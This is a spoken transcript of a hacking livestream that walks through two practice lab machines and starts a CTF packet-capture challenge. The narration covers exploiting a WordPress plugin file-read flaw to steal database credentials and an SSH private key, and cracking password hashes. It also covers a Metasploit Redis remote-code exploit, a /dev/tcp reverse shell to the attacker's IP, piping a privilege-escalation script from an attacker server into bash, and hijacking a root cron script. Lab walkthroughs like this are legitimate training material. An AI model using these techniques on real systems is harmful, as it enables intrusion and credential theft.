Testing 1 2, testing 1 2. I'm just waiting to hear from chat, make sure sound is working, and make sure this is 1080. 1080, it looks fine. So, looks like it's working now. Not sure exactly what went wrong there, but it didn't want to let me use Streamlabs. So now I'm back on OBS. So. So everyone's saying sound is good. Good. Oh, what is the subject for today? I was gonna do a lot of Ansible stuff, but since I had to switch to OBS and off of Streamlabs, all my scenes are kind of screwed up right now. So we'll probably just do some CTFs or something. So we'll have to change subjects, but it'll still be a fun 2 to 3 hours. So let's see. Let me just tweet it out. I don't even have a count on Try Hack Me, so I couldn't do it King of the Hill if I wanted to. And I kind of don't know how I feel about doing those on live streams. Just because, like, if there's not a big box rotation, then if I do it and show, like, all the best stuff, there's going to be, like, right now, like, 400 people just mimicking that. And it kind of defeats the whole purpose. So there has to be a giant backlog of machines to stream King of the Hill, unless it'll just kind of ruin it, in my opinion. We're actually not doing Ansible because I just ran into too many issues. So we have a choice. There's 247 CTF. This is going to be lots of small challenges. We can do the versecon CTF. Has a bunch of various challenges. Or we can do Cyber Sec Labs. So I'm going to show each of the sites, and then you decide what we do. So, yeah. So 247 CTF, cyberseclabs.co.uk, or what was the last one? versecon. So let's see if we can get the titles, what the challenges could be. Let's see. We're not doing any antivirus bypassing. That's not going to happen. Sorry. Hold on 1 second. Let me create an account. So I'm just creating accounts on all these places. Let me put up text. There we go. Sorry for no graphics. Again, because Streamlabs wasn't working for whatever reason, I can't use it. Let's... Okay, so here's the things. We're probably going to do a little of everything today. Just tell me where you want to start. This is 247 CTF. We have crypto challenges, miscellaneous, networking, parentable, reversing, and web. If we do this site, I'd probably do... I was recommended to do... let's see. What was it? I think flag lottery and miscellaneous, not my modulus and networking, and helicopter administration and web. So those are the 3 options on 247. CyberSec Lab, we can probably knock out all the beginner labs. VersecCon, we can do the binary exploits, web, or forensics, I guess. Okay, if you spam, I'm just going to kick you. So don't spam like Active Directory Pentest approach. Okay, let's see. Yeah, I did walk through the binary exploits with Cyber Mentor a while ago. Yeah, I'm just looking at the chat. I guess we can do a straw poll. See, I don't think it's letting me send a URL. So I put a straw poll link in the chat. So I'm going to let this go for like 2 minutes and then... So when this poll is 4 minutes ago is when we'll decide. Yeah, it sucks that it took like 20 minutes to get running. Technical difficulties does that. Ansible will probably come the next time I do a stream. I had a bunch of different scenes set up so I could like switch between monitors and stuff, but I just had to switch to OBS, which I lost all my settings. I didn't set it up for Streamlabs. Whenever I was going live on Streamlabs, it just wasn't showing up on YouTube. So it looks like CyberSecCon or SecLabs wins. So we're just going to do all these machines. It's in the beginner lab, so should be relatively quick. Let's see. Let me download the VPN pack. I don't think CyberSecLabs is free. They're all relatively cheap. So VPN, what is it? ipsec.ovpn. Okay. So let's just go and we'll go left to right on the boxes. Are these sites free? I don't think this one is. 24/7 CTF is, and VersetCon is free, but that won't be live forever. So I'm going to start with CMS. And I'm just going to go left to right and do all of these boxes. Let's see. Is it up yet? Not yet. Is my VPN working? Says it's live. Have I done these before? I've seen some of them. The Cyber Mentor was doing a charity stream, and I watched and helped out a few of the machines there. So, probably I think 3 or 4 I've seen. Like, Eternal's obviously going to be Eternal Blue. I guess I think I've seen Simple. How long will I be streaming? Honestly, I don't know. Probably another 2 hours. So the box is online now. Let's start off with the Nmap. So make the directory nmap-sc-sv for enumerate versions and default scripts. OA, output all formats, put in the nmap directory, call it CMS, and then the IP address, which is 172.31.1.8. And since we're doing this live, I'm going to do a -v. This is going to show me open ports as it finds it. And then I'm going to sleep for 5 minutes and do an nmap scan on all ports. I hate having nmap run twice because they can interfere with each other, which causes issues. So we're going to put everything in the nmap folder. Did I not create that? Oh, I have to redo my tmux because it's not going to auto start me in that CMS directory. So let's start this back up. And then call this CMS-all ports. Will this be recorded and posted to YouTube? Probably not. The VOD will probably be on YouTube, but I don't think I'm going to splice it up and have individual things. So I hope that answers your question. Looking at the ports, we have SSH and WordPress. So let's go take a look at what the WordPress is. So 172.31.1.8. And we're just getting this page. So if we look at the page source, this is probably how nmap could identify that was WordPress, because in the page source we have wp-content. Looking at the actual blog, we do see a post by Angel, so this is going to be users. So let's create a node. This will be called CMS, and then we'll put users here. And we got Angel. Hold on, let me just mute my phone. Okay. So if we now go to like wp-admin, we can try logging in with Angel or admin, but we only know the Angel user, so we can do Angel password or Angel. Nothing works. If we do back to the page, go to blog, see how it does users. So we got author Angel. Let's try author 0, page not found. 0, 1, no. There's a way to, I think, enumerate users based upon knowing the user ID. I'm not sure how to do that, so we're probably going to send this to a tool called wp-scan and then identify it that way. So I'm going to do wp-scan-h to display the help. And let's see, is there a enumerate user options? Enumerate user IDs. So let's dig into exactly how wp-scan does this. So let's do wp-scan-eu-u for URL, I believe. Paste this. And then there's probably a proxy option. So --proxy. Because the easiest way to find out exactly how wp-scan's doing things is just sending it through Burp Suite. So we're doing -p or --proxy http 127.0.0.1:8080, and this is going to be how we send it to Burp Suite. So let's go to the proxy tab, turn intercept on, send this, and it's probably --URL. There we go. Do we want to update? Let's not. Click forward. And let's just turn intercept off and then look at the history for everything it's doing. And it should become obvious how it's enumerating users. So it's doing this author 1, 2, 3, 4. And it's doing a head request first. So a head is only going to respond with the server headers. So what wp-scan is doing right here, it looks like it's doing a head request for like author 1. And if it gets a 301, it's going to remember that user exists. If it gets a 404, it's just not going to do anything. So it's going to do all these. And then after it enumerates all the users, it's going to go back and pull the user with a GET request. So we can show this in curl. So if we right click, copy as curl command, paste, And that's all the server responds with. So after that, it's going to do the get, and the get's going to actually pull the content of the page. Or I thought it would have. Let's see. Moved permanently. Oh, author angel. So it's looking for the location. So in Firefox, if we go here and intercept this request, you'll see we do the get, and the server is going to say, hey, that user exists here. So that is how WP Scan is enumerating usernames. And that's also how we can be relatively confident we've enumerated all the users with our scan. So let's see. Someone's saying there's an endpoint at WP JSON WPv2/users. Let's check this out. So someone in the chat just said, check out this URL. So let's see what this does. Not found. Is it under WP content? Nope. So I'm not exactly sure what that WP JSON thing is, person in chat. But let's just keep going. If we wanted to do everything with WP Scan, you could just run it or look at all the things it can enumerate. And it's vulnerable plugins, all plugins. So let's do all plugins. So if we do WP Scan -E, all plugins, and let's see exactly how it does this. I'm guessing it just has a database of vulnerable plugins in it, and it requests the page like wp-content/plugins/plugin name is how I'm guessing it's going to work. So let's do this and go back to Burp Suite, look at the history, and see what it's doing. That was quick. Let's see, post. I'm not actually sure how it found that so quick. Run this again. Nope. Is it not going through Burp Suite? It is. So maybe it's through this XML RPC? Weird. So what I'm going to do is I'm just going to grab this text and let's just search for everything that contains this text to see exactly where it found it. Oh, it may be because it's coming back in JavaScript and we're probably ignoring JavaScript. That could very much be it. So let's go to options and let's see. Intercept client request. Let's intercept them all. So this has the intercept if it doesn't contain these extensions. So if it's trying to pull JavaScript things, maybe that's why it's not showing up in our history. So let's have it pull that, run it again, and see what happens. I'm honestly not sure what's going on. That happens every now and then. So I'm going to forward each request and see what happens. So once it hits that XML RPC, then I think it stops going through the proxy. That's not it. So we're going to, I guess, just move on because I'm not sure how it's enumerating plugins. It's doing something through this, and then Firefox just isn't intercepting it. So we do have one, WP with Spritz. Let's see. Try to only talk English in the chat. So if we do search exploit Spritz, it does come up with an exploit. So we can do search exploit -m to mirror, or m and then actually paste this. And then look at it. And we see it is a LFI, and it's going to this URL. So we can just copy this proof of concept. The other important thing it's saying is it's a file get contents. If it was like include here, then we could execute code. So because it's file get contents, I'm not going to try doing a bunch of like log file poisoning by putting PHP as like a user agent and then doing LFI with a log file, because again, file get content doesn't actually execute PHP code. So we can test this out by putting this in, turn intercept off, and it gets the etc passwd. Searchploit is just a like command line utility for exploitDB. Everything that's in Searchploit is also on exploitDB. It's just so I don't have to query the URL and do it every time. So let's see. One of the main things I always like looking for is the WP config. So let's try //// var www html, and then we'll try index.php, see if we can view this. We get nothing back. So let's see if we can do a PHP filter. So going back to the code, we get a direct access into this file get contents. So PHP filters should work as long as a PHP filter works in file get content. If it had said something like, let's paste this. If instead of it being straight into file get content, it was going to like upload / then a PHP magic, what we're about to do with PHP filter won't work, because PHP : / has to be at the very beginning. So let's, I guess, put this over in burp so the font's a bit bigger so you guys can see exactly what I'm doing. So intercept on. That's not it. Let's go back. This page. There we go. So what I'm going to do is do PHP : / filter / convert dot, I think, base64 encode / resource is equal to, let's do one we know that works. And it was etc passwd that we pulled before. And it did a base64 on the output of this. So if we copy this and go to echo -n, paste base64-d, you have etc passwd. So now we should be able to pull that index.php file. So let's do var www html index.php. And we don't get anything. Let's just try index.php here. Don't get anything. Let's go up one directory. And there we go. We got one. But that's not that big of a file. So let's do echo -n and paste this and see what this was. Silence is golden. So let's go up one directory. Another one, and this one's a bit bigger. So a lot of directories may have like an index.php just so directory listings don't work. So this one is looking a bit more normal. I think now we're in the parent directory. So let's look at where the WordPress config is. I think it's in the home directory as just wp-config.php. It looks like it is. And the reason why I like grabbing this is just because having database credentials may have password reuse. So echo -n, paste all this, base64-d. I have triple dots in the LFI command. Maybe that is from it being delayed. So looking at this config, let's see what we have. DB password, new password to be set. So we can go back to cherry tree and create a new pane. Passwords. Whoops, I only did Control N. If I do Control Shift N, it'll create a child node. So we can set that. So let's try Angel with this password and WordPress. So we can, I guess, turn Burp Suite off here. And then in Repeater tab, I always like renaming. So we'll do CMS B64 exfil. So let's go to wp-login, Angel, password needs to be set. I'm just going to double check that was the correct thing, and we can't get in. So that's a bummer. Let us go back to the blog and read everything it said. And this post has how they set up the WordPress web server. And we see a screenshot showing the SSH keys ID RSA. Have I done this box before? I've seen this box before. I didn't actually do it, but I was helping someone out with it. So we go to a few more dot slashes. So right now we're assuming we're in var www HTML or something. We got 3 directories, and that was probably the WP with spritzz, plugins, and content. So let's just go up a few more times. Test it with etc passwd. Probably have to go up another one because we didn't get anything. There we go. So now we can try homeangel.ssh. And then ID RSA. And we probably can take this filter off because we're not exfilling PHP. The reason why we did this is because if you try pulling any file that has the PHP tags, it's going to execute it. Actually, I believe that's the case. Let's create a new thing. Can we go back a few times? So let's try, whoops. I guess index.php is fine. Let's just take off this PHP filter and try getting this page. Oh, we didn't have to do that. That PHP filter is a trick for that's only useful when you're doing a include. So again, if this source was include, not file gets contents, then it would have executed everything between the PHP tags. But since it's a file get contents, you don't have any code execution, so it happily displays contents between these 2 PHP tags. So that's why we didn't have to do that, but it's kind of a habit for me. Whenever I exfil data, I normally always do some type of base64 encoding, just in case there's something weird going on that just kills the download stream. So let's go back to where we were and grab this SSH key. So we can take the filter off and then send this, and we have a key. So let's do vangel.key, paste it in, ssh-i angel.key, angel at 172.31.1.8. Yep. And then also have to chmod 600 on angel.key. We can log in. And now we're on the box. So I don't want to show any of the keys, but I think this has access.txt and system.txt on this website. So we have all the keys there. So we can take a look at like MySQL history to see if there's anything here. This is where they're creating the WordPress directory. I'm not going to go into bash history because we see the size is 0. We know what .ssh is. One of the good files to grab is known host if it's there, because that will contain boxes that this thing has SSH to, but nothing's there. So we do sudo -l, whoops. I guess LK doesn't break anything, but we can see we can run sudo su. User Angel may run the password on all the on CMS and get access. But there's one thing that does irk me a little bit that I haven't done yet, and that is what is the Angel's password to WordPress. So let's do it ls-la, nothing there. Let's go to www.html. Go back into that WordPress config just because it's easier than going over to Cherry Tree. Is it in find.grep config? Cat wp-config.php. Oh, I don't have up or down because I guess how the box is configured. But DB user is WordPress user and DB password is new password to be set. So I guess we could have in Cherry Tree, if we're better at taking notes, instead of having a passwords pane, we could also have creds, and this would have WordPress user colon this. Would be a bit better. But we can do MySQL. Let's see, MySQL -u WordPress user capital P. And I think it may be a capital U. Nope, lowercase works. So then do -p, and we can just paste this password. Access denied. So let's specify a database. I think database is either capital D or lowercase d. I, again, always get those mixed up. So let's copy WordPress DB. New password to be set. Oh God. New password to be set. Not having the up air is really messing with me. So let's see. Let's try lowercase d. We know the credentials are correct because if they weren't, then this WordPress instance just wouldn't work. So, let's try this again. And then I think -h is for host 127.0.0.1. Maybe this will work. Access denied. Is it a capital U for WordPress user? Yes. So I wonder if that's it. I wonder if we got a casing issue. User -p-d WordPress DB -h 127.0.0.1. Paste. Does not work. Cannot connect to database 127.0.0.1. There we go. Wasn't -H, but now after all that trial and error, because of forgetting to capitalize a U, we get into WordPress or the MySQL database. So we can run show tables and then select stir from WP_users. And this is probably not going to be that readable. So we can because there's just one user. If there was a ton, I wouldn't like this. So let's just do describe WP_users and then select user login, comma, user email from WP_users. And whoops, we probably want not email, but user_pass. There we go. And it's $P$. So let's go and go into our cracking machine and see if this is a weak password. So let's do vi hashes slash cms dash wp. Paste this in. Did it do... Can't open for writing. What? My read only? Oh, I gotta go in the hashcat directory. There we go. V hashes cms dash wp dot text. So hashcat dash dash example hashes, go less, and then I'm just going to search for $p$, maybe backslashes. There we go. And it's PHP pass, mode 400. So let's do /hashcat dash mode 400 hashes cms dash WordPress dot text, and then opt word list rocku.txt. Let's just see if it's in this database. Why is that not in bcrypt? Probably because it's an old version of WordPress. I'm not going to do kernel exploitation videos anytime soon, Justin. So we did not crack the password. So let's do -r for rules, and then rules, inside pro, passwords pro, and try this. And we'll see how long this one takes. But since it went through Rocku pretty quick, this is actually going to be 1 hour and 58 minutes. So let's just do best 64, and that'll probably be about 10 minutes. And we can move to the next box while this goes. So let's see, 2 minutes. So we'll see if that works. Doesn't look like it will. So that is the box. It was just sudo su once you got on. So let's go to a different box. Let's see. So you guys probably want to see one I haven't done. So I haven't done shares. I haven't even seen shares, shock, red, or lazy, I think. So shares, lazy, or red. The Kraken is just a box in my basement. So I'm going to type it in chat. Okay, looks like it's caught up. We got 1 for red, 1 for lazy, 2 for red. So let's go over to red. So stop that, start this. And then we'll wait for this one to come online. So after the red, we are going to do 247 CTF and do those 3 challenges. And then after that, we can do a challenge from either Versec Labs or VulnHub machine. What do the rules in hashcat mean? Let's just kill this because it doesn't look like it's working. So it's easier to do with the force option. So let's just learning, and we'll put the password of password. So if I just execute hashcat with force, oh, I don't need force because I have GPUs. If I was doing this locally on my Kali machine, I'd do force. But hashcat, and then --sd out, learning. Let's see what this does. It may not do anything. I'm hoping it just outputs the word password. Yeah. So instead of password, let's do please subscribe. Doesn't really matter what you put here. We're just going to show what the rule files do. So running this, once it goes, it just says that. So if we do a rule file, let's just do best64, that's no longer going to output one line. It's actually going to output 64 lines because it's the best 64 rules. So you can see it's doing all these permutations on that one word. If you do look inside of rules, there's other things. So like leetspeak.rule, if we do this one, it's going to convert it all into leetspeak. So we can see like PLE4 at, so does all that. So how do the rules work? Let's take a look at toggles, because toggles is easy to understand. So toggles 1 is going to toggle the case of a single character. So hashcat rule files, it's always like 2 characters. So T0 is going to be toggle character 0. T1 is toggle character 1. And whenever I say toggle, I'm saying change the casing. So let's just do 2 and 3. So this will just be 4 lines, or 4 rules. So when we do this now, it'll have please subscribe and then play with the casing of the first 4 characters. So T0 did a lowercase p, T1 did a lowercase l, so you can kind of see how that's working. You can have multiple things in one. So if we do T0, T1, T5, then it's going to toggle those cases. So we can see it changed the toggle of 0, 1, and whatever, but yeah. So red should be up now. We should be able to do this. So let's take a look at what this box is. So ping. There we go. So the box is up. So let's make the directory nmap-sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it red, and then the IP address, which is 172.168.1.9. And I'm going to run the -v flag so we see ports as we find them. Let's do the second nmap, just in case there's a port that's not in the top 1000. So sleep 300. nmap-p- to do all ports, oa, output all formats, put in the nmap directory and call it red-all ports, and our nmap schema already finished, so I'm not even going to do that sleep. 172.31.1.9, and this is running Apache, and we have 2 ports so far. So let's go over to the box to see exactly what it is. So 172.31.1.9, and we just see a page that says business solutions, and the very first thing I'm noticing right now is that copyright is 2011. So this kind of sticks out like a sore thumb, probably going to be some type of old vulnerability because, well, the copyright is old. I'm clicking around these things to see if it's going to tell me if it's PHP or not. Going to blog, we do have a link, but that's going to freewebsitetemplates.com/forum. So that's going off the box. And all these are going to blog.html. So I'm going to try index.php, just see if it exists. It does not. I'm going to try robots.txt to see if that exists. It doesn't. So let's throw this in GoBuster while we take a look at other things. We do have a high-level port, 6379, that is Redis. So let's do GoBuster -dir-u for URL, HTTP, I don't need that twice, -w for word list, user share word list, then dirbuster directory list 23 medium.txt, out file is going to be gobuster.out. And then while that goes, I guess we can take a look at Redis. So I'm just going to run search exploit Redis, and we have a few. There is a Metasploit RCE, so let's use this one actually. So let's just do msfdb run. And I'm sure we've done this in Hack the Box as well with doing it through command line. So if we do Redis create file, it's something with creating a config file, then deleting it and dumping the cache somewhere. Let's see. Let's just search Redis pen test cheat sheet. There we go. Pen testing Redis and hack tricks. So we can run these commands real quick and then go to Metasploit. So let's just create a new pane. Do I have Redis CLI? I do. So Redis CLI -h 172.31.1.9. And you can run these commands to see what they do. Info is going to display info about the box. Then we have config get and keys. So let's see, we did key star in that list, nothing. We could unset the config and then write a line and then drop it into a file, which I'm presuming Metasploit's going to do. But let's show analyzing what Metasploit does. Since if you go to my YouTube channel, you have me exploiting it manually. So this one, let's use Metasploit, and we have file upload. So if we do, actually, it was an RCE, right? Browse. There we go, this one. Use exploit Linux Redis, show options. Is using Metasploit okay for preparing for OCP? As long as you do what I'm about to do, I would say yes, and make sure you know exactly what Metasploit is doing. A lot of people are like paranoid against using Metasploit, but honestly, if you shouldn't use Metasploit on a box, chances are they're not going to make it Metasploitable. So that's my 2 cents on it. We can kill this Go Buster. We don't need it anymore. If config ton 0, get my IP address. Set our host 172.31.1.9. Set serve host, this IP. This should be fine. If we run this. Oh, wait. Shoot. Did not want to do this yet. We're going to re-exploit this. Let's just see if it worked. What is the command? Shell? ID? Yeah, that works. So, before we do Metasploit, let's do TCP dump -I for interface ton 0. S0, I think will capture the entire packets. If you don't do that, you may just be capturing a portion of the packet. So always be careful with that. Write for, I think, -W is right. And then we'll do Redis unauth exec.capture. And now, let's run the exploit. So once we get a shell, let's open this inside of Wireshark and see exactly what it did. So if we had to redo this, we could do it without Metasploit. Or if one piece of the exploit broke, we could have still done it. So Wireshark, I forgot the S there. So let's see. Oh, I'm just still doing a ping. We can kill this ping. So let's see. what port was Redis? Let's go into red, less nmap red.nmap, or it's red all ports.nmap 6379. So we can do tcp.port is equal to 6379. And then we can just right click, follow TCP stream, and see what it's doing. So here is us issuing commands. Stir $3.7 slave of. So this is us logging in. Does OK. We do config set db file name zausdh.so. And then module load zausdh.so. And then it executes it. So we're uploading a library and then doing a module load command inside of Redis. So Redis module load, and we can see what this does. Loads a module from a dynamic library at runtime. So let's see. If we go back into our shell, what's it say? It may require manual cleanup of this file. So does that exist here? It does. And I guess we can see other people exploiting it, so like a month ago. But let's download it. So let's do git download this file. And we could keep going and exploiting the box, but I feel like looking at what this library is. I'm assuming we could just go into the Metasploit source and examine it that way, but I think this will be more fun. So I'm going to go to cutter.re, and we're going to download this. This is in the apt repository, but for some reason when I was trying to run it out of the install and apt, it didn't have Ghidra's decompiler built in, and I didn't like that. So I have better results running it off the version we download online. So let's see. And I haven't actually ran Cutter against a Linux file. I've only done it against Windows executables. So Cutter is going to use Radar on the back end and essentially as a debugger. So it's a GUI to the tool R2, which you may have seen me use, but it's also going to have Ghidra's decompiler in it. So it just comes super handy, disassembly tool, because it's more easy to navigate than Ghidra in my opinion, and it's free compared to what IDA cost, and it also supports debugging. So it's just all around an amazing tool in my opinion. Not sure why it wasn't downloading, so I turned it off burp. Maybe that was why. There we go. So chmod plus x downloads. Chisel, is it there? Yeah. Let's just execute it at downloads. Is it still downloading? Come on. Curse of the demo gods. There we go. Now it's executing. So we can continue, and let's open the file. So we are in root CSL red this .so file, and let's yellow this and hope it works. So let's see. We got sim.shell. If we do view or Windows decompiler, let's see what this says. Fork. Whoops. I'm actually not sure what this decompiled output is telling me. This one may be easier to go with looking at Metasploit source. Ah, here we go. Redis module on load. Shell read only. look at the strings, see if we see anything. Don't really see too much. Get the assembly. So I was expecting this to actually be a lot easier to reverse to see exactly what it's doing, but doesn't appear that way. So let's take a look again at the Wireshark. So it did module load. Is there another stream? Am I missing something? Stream 3. Yeah, I'm actually not sure what's happening. Let's just take a look at the Metasploit code real quick. I was expecting to see something obvious where it's just running a command to call back and execute something, but I did not see that. And I don't see Metasploit issuing the command to do that. So let's do locate on this. We got an MD file, which is normally documentation. Vulnerable application, Docker poll. Payload options. So hoping it gave a URL to this actual attack. I'm opening this one in Vim and not less, so I have syntax highlighting. So let's see. Check, we don't really care about that. Exploit is good. Redis module init. Module name, shell exec. Those are defaults. Let's see. Create payload. What is it generating this module? Redis command get. Hopefully this doesn't take too long to run that grep. I'm not actually super familiar on the inner workings of Metasploit, so bear with me. Ah, Redis module.h. So here we go. Module.c. So it's a shell. So it looks like it's just letting interpret a shellcode. I'm just not sure why I didn't see that when I was reversing it in Cutter. So let's just go and do this box then. So shell ID, let's try sudo-l, no TTY present. We could probably do the TTY trick here, but I mean, I just rather have a shell and netcat than Metasploit because I'm more familiar with that. So nclvnp 9001, and let's just do a shell. So dev tcp, shoot, what's the IP? ifconfig ton 0, 10, 10, 0, 11, 9001. Like that, I think. Maybe not. Shell. Let's see. It's probably and that way probably or something. It's probably something simple I'm missing. Pentest, cheat sheet, pentest monkey, reverse shell. Oh, this one's going over 8080. 9001. And I have to fix the stupid IP address. So 10, 10, 0, 11, 9001. There we go. Finally got a shell back. So python-c, import pty, pty.spawn, bin bash. There we go. pwd, python-c, import pty, pty.spawn, bin bash. My shell died. Let's run this again. And I'm just going to wait once I run this to see if something happens. I'm not getting my bash prompt back. I'm going to redo the exploit. Did not mean to exit. So let's redo all this. Show options. So we need to do rhost, lhost, lport, serve host, it's already listening on 9001. Set lport 9000. Run. Paste this, and let's put the correct IPs so I don't make this mistake again. It's so much more difficult to do these boxes and try to read the chat at the same time. So run this, paste, got the shell. I'm going to wait to see if this shell dies. And chat, there's a slight delay, so if you keep spamming something, chances are I'm not going to see it in time. So go to /home. We can look at ant. And there's access.txt. I'm going to do lsla and see what else is here. Doesn't look like we have anything. We're going to try the Python thing since it doesn't look like I'm losing my shell. We don't have Python 2. Do we have Python 3? Which Python 3? Looks like we do. So we do Python 3, import pty.spawn, bin bash, and then st2i raw minus echo. Foreground it. So now we have tab auto-completed things. Do we have curl? We do have curl. So what I'm going to do is we're going to go over to this window, go into red, make dir dub, and then cp opt privilege escalation awesome script suite, linpeas, and then linpeas.sh to dub. And then I'm also going to copy opt linenum to dub, and then we can go there and python-m simple. Oh, we'll do Python 3. Python 3 http.server. And now we can go curl 10. It's going to take a while to get used to not using a hack the box IP. If config ton 0 10 10 0 11 8000 / linpeas.sh. Pipe it over to bash and see what it has. So let's see. Come on. Just waiting for this to finish. And if we don't find anything here, then I always run linenum. So linenum is normally the second one I run. Let's see. Come on. Oh, we saw something that was red and yellow. User local bin. Why was that red and yellow? Owned by me or writable by everyone, not in home. User local bin is. So I'm guessing this is in red because this is going to be in path. So if I can write to this directory, then I can create other binaries and potentially hijack paths. So like if we echo path, user local bin is here. So if there's a binary that is in like /bin, and I put a binary with the same name in this path, and someone types that binary like, I think ls is in bin. So if I made a binary ls and use a local bin, and then someone typed ls, it would execute mine. So that's definitely interesting. So let's see. Kernel, where's the date? February 11th. It's up to date. No use in looking for a kernel exploit. Or I shouldn't say no use. It's not one of the things I go to when it's a few months old. We'll get users. Let's see, config files. Nothing interesting there. Nothing too interesting. Let's see. That's in red, but it's pointing to 2002. I'm just looking at these setuid binaries again. writable log file. So right now I'm thinking maybe there's a cron job running as root and we have to hijack user local bin. So I'm just going to test this real quick. User local bin, touch test. We have permission denied. So can't do that. I can overwrite like Redis CLI and Redis server. So if we reboot the box and Redis is running as root, we'd be able to put code execution there. But looking at PS, everything that is executing any of these Redis scripts is running as Redis. So I don't think there's really much attack path being able to overwrite Redis itself. And since we don't have write access into bin, nothing's there. So we're still at nothing. And is there anything here? Bash history is 0. Nothing there. So let's go back and curl and run linenum. I believe I had tried sudo-l. So linenum finished quickly. I don't think it was in thorough mode. Let's see. Yeah, thorough test is disabled. So if you want to do a bit more thorough checks, you could set that to enabled either in the script itself or just download this to the box and do -t. So looking through this one, let's see, home ant, sudo as admin is successful. So my guess is we may have to get over to the ant user. Shells. Just quickly going over this output. Doesn't look like there's too much useful. Can we read write sensitive files? We only have read access to passwd. So let's see. Let's check var dub and go into the webs directory. Maybe there's a config file here and there's password reuse somewhere. So let's see. We got a Adobe Photoshop file. That is definitely unique. Let's see. grep-r password on dot. Anything here? Nothing. ps-ef grep Apache. I was just saying what user Apache is running as. Because if we can write a file here, we could potentially switch users, but nothing's here. Looking at the ports listing on the box, see if there's a database. Doesn't look like there is. I was looking for like 3306 or whatever Postgres is. So let's look at opt, nothing there. cd home, ant. Access.txt is probably just a MD5 hash. We see it's 33 characters. Vim info, what is this? Permission denied. And, oh, we can read it. Anyone can. So let's see. su ant, password of password. Nothing. Cat etsy passwd. So let's try find slash was it find file between two dates. Let's see. This is what I want to do. So let's do find slash newer MT of 2020 03 01, and let's do 2020 03 09. And let's do to dev null to hide error messages. And I should have done a -ls so we can see file permissions. And we can take a look at this. So this is showing all the files modified between those two dates. And that can be useful sometimes. Doesn't look like this is going to be the case. So let's see. There's something probably basic that we are missing. So let's go back to the Redis cheat sheet and inspect what's actually in it. Pen testing Redis. So 172.31. What is the IP? 1.9. We can try sudo-l, but it requires a password, and we don't know the password. We can try password, Redis. So nothing there. .9. I wonder if the Redis CLI is not working because we're doing this shell. cd red, cd nmap, cat red, all ports, .nmap. Let's do nc-zv to see if this port's still open. 172.31.1.9, 6379. It is open. Nothing there. Uname. Let's exit this pane. Whoops. Let's move window. And I'm going to Control-C to terminate the channel. Shell. I want to see what directory I'm in. I'm in var-lib Redis. lsla 6379. We're just in var-lib. Okay. exit interpreter, and maybe we can get the Redis CLI back. Config git star. See what else is here. Maybe we have a password in this. See, db file name, that, no password. Let's see, is there anything else we can do? Doesn't look like it. Let's get a shell back. Rerun the shell. Forgot to copy a B. Let's see. Just see if there's a kernel exploit for this. Let's see, 4510. This is 2019. Doesn't look at anything for this. Let's see. What is this? Linux kernel vulnerabilities. I wish this page was formatted a bit better. See, has this been updated recently? 21 days ago. Let's grab this. Linux exploit suggester. So cp Linux exploit suggester, this bash script into red www. We'll just call it exploit-.sh so it's easy to type. And then grab the IP. Curl 8000/exploit.sh, pipe it over to bash, and let's make sure we're listening. Python 3-m, http.server. Run this, and let's see what it suggests. Sub-UID shell. Don't really see anything there. Let's see. Cat, Etsy, passwd. Can I make Redis and can we just SSH in? We can't. Let's see. Default password Redis user. There is no password by default. So let's run GoSpy real quick. Have this running in the background while we work. Is there releases on this? GoSpy. So we don't have to compile it. Package release. Go get. Let's see. Git clone. GoSpy. Go build. Go get. Go build. Where is it actually writing to? Oh, this isn't what I think it is. PSPy. This is it. Monitor Linux processes. So what I'm trying to do now is just monitor everything that's running on this box. So if we go red www cp downloads pspy64s. The S is small, so chmod plus x, and let's download that to the box. So let's go to dev shm, and I'm going to do the tty trick again, so I can control Z out of anything if I want to. So pty.spawn bin bash sty raw minus echo foreground, and then wget 10.10.0.11 8000 p spy 64s. There we go. chmod plus x. And let's run it. And I'm going to wait probably around a minute, look at chat to see what people are saying. So a lot of the reason why I skipped a lot of the like privesks it was saying is because the kernel was in February of 2020, and a lot of the privesks were like 2018, 2019. So I just ignored those because I'd assume a 2020 kernel wouldn't be vulnerable to 2019. Could be wrong, but let's see. What is this? Verilog logs shell.sh? I wonder if that's from me? Yeah, that's my shell. Okay. Wait. No, that's not me. That's not my IP. That's weird. let's change. It's funny that it's using port 9001. Like, I guess so many people use that port now. But I'm definitely not 3. Let's see. Ping 101003. I'm going to be sad if someone's on this box and just trolling me. There we go. Root. So, let's see. How was I supposed to know this? Every minute, it's executing var log redis log manager.sh. And catting. Man, that is silly. So, looks like there's a bash script in Verilog, which typically, I don't think you see that often. Because normally Verilog just contains logs. But there's a bash script in here that is executing anything inside of this. So, wow. That took a lot longer than it should have. But eventually, you go through it. I guess I should do PS by quicker than not. Maybe right after I run all the enumeration scripts, I should start that in the background. But, yeah. So, looks like people wanted to switch to something that's more challenge-based. So, let's do 247 CTF. So we're going to do challenges now. And it should be fun. Hopefully. Someone saying, say that again. IPSec didn't notice. Where is that user? Oh. Someone in chat actually had done that. That IP is someone else. So. It's pretty easy to overlook things when people are doing things that look exactly like what you do. Like, there's a good possibility that if I saw that just glancing over, I'm like, oh, that's my web shell. Okay, let's just move on. Because, again, it's only the IP that's different. So, I'm going to switch to challenges. So that's that platform. This was a new one that someone wanted me to demo. And it doesn't look like I'm logged in. Come on. I was logged in. There we go. So we're going to do the challenge networking, not my modulus. Raver, I am doing helicopter from this. So, hold on. We can do some background. Let's see. So on my enumeration scripts, Adam, yes, the log folder was writable, but for Redis to write logs, it has to write that log anyways, doesn't it? Or I guess it could go through syslog, but having write access to logs is not that uncommon. That's essentially how like log poisoning works. So let's see. How do I show this without... Hold on 1 second. Turn that off. And let's see. So I'm just pulling something up on my screen. I just didn't want people to see everything. So I just want to filter before I show things. Let's see. Okay. So this is why I'm doing the machines I'm doing, is because 247CTF had messaged me and said the most accessible challenges that they are proud of is helicopter administrator, forgotten file pointer. Let's see. Not my modulus was here, I thought. Okay, yeah. So flag lottery, not my modulus, and helicopter administrator. So that's why I'm doing these challenges. So we're downloading not my modulus. And that should have been downloaded. I think that's that 9.3. What did it download as? 931. Unzip. So let's see what we're presented with. We have encrypted.pcap and keys.tarz. So let's unencrypt this. And we can look at keys. And we'd have a bunch of keys. The challenge says we're trying to decrypt a packet capture taken on an internal network. We know you can decrypt the data using the correct private key, but we simply have too many. Can you identify the correct key? So, looking at what these keys look like. Begin private key. Nothing too interesting. So let's go and look at the PCAP. Let's see. Is there an easy way to make this font bigger for people? Let's see. Appearance. Fonts. Main window. Okay, that may be a bit more stream friendly. So let's see, we have a giant PCAP. Or not giant, very small PCAP, 15 packets. And let's see, 8443. So it looks like the web server is listening on 8443. Our client IP is 172.17.03. So 